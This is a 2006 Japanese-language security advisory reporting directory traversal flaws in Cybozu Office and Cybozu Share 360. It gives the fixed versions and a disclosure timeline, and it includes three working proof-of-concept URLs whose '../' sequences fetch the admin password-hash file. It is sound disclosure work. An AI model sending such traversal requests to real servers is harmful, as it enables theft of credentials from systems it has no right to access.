vuln.sg Vulnerability Research Advisory

Cybozu　2つ製品にファイルダウンロードの脆弱性 by Tan Chew Keong　タン　チュー　ケオン Release Date: 2006-08-28    [en] [jp] 概要 Cybozu　2つ製品にディレクトリより上位 のファイルにアクセスできる脆弱性がありま す。 悪意のあるユーザは、この問題を利用しサーバーに他のファイルをダウンロード可能性があります。 問題を確認したバージョン Cybozu Office Version 6.5 (Build 1.2 20050427121735) for Windows Cybozu Share 360 Version 2.5 (Build 0.2 20050121115231) for Windows 問題 この脆弱性報告は、Cybozu 2つ製品にファイルダウンロードの脆弱性を公開しました。 1) Cybozu Office ファイル　ダウンロード  ディレクトリ　トラバーサル Cybozu Office には、ユーザーのためにファイルをダウンロード前に、"/scripts/cbag/ag.exe"　の　"id"　パラメータ処理が不十分であるため、 ディレクトリトラバーサルの脆弱性が存在します。 悪意のあるユーザは、この問題を利用しサーバーに他のファイルをダウンロード可能性があります。 例　(システム管理用のパスワードハッシュをダウンロードすることができる): http://192.168.1.64/scripts/cbag/ag.exe?page=FileDownload& id=../../../../../../../../../../../../../inetpub/scripts/cbag/cb5/data/admin&notimecard=1&type=text&subtype=html&ct=1   2) Cybozu Share 360 ファイル　ダウンロード  ディレクトリ　トラバーサル Cybozu Share 360 には、ユーザーのためにファイルをダウンロード前に、"/scripts/s360v2/s360.exe"　の　"id"　パラメータ処理が不十分であ るため、ディレクトリトラバーサルの脆弱性が存在します。 悪意のあるユーザは、この問題を利用しサーバーに他のファイルをダウンロード可能性があります。 例　(システム管理用のパスワードハッシュをダウンロードすることができる): http://192.168.1.64/scripts/s360v2/s360.exe?page=FileDownload& id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/admin&type=text&subtype=plain&ct=1&.txt http://192.168.1.64/scripts/s360v2/s360.exe?page=MessageDownload&mid=37& id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/admin&bc=1&type=text&subtype=plain&ct=1&.txt   対策 Cybozu Office: Version 6.6 (Build 1.3) へのバージョンアップをしてください。修正版のダウンロード。 Cybozu Share 360: Version 2.5 (Build 0.3) へのバージョンアップをしてください。修正版のダウンロード。 参考情報 http://cybozu.co.jp/products/dl/notice_060825/ 発見と報告の経緯 2006年07月04日　-　脆弱性の発見。 2006年07月13日　-　ベンダーに報告しました。 2006年08月25日　-　ベンダーは修正版をリリースしました。 2006年08月28日　-　本脆弱性の公開。 2006年08月31日　-　Corrected spelling error in product name.

Contact

For further enquries, comments, suggestions or bug reports, simply email them to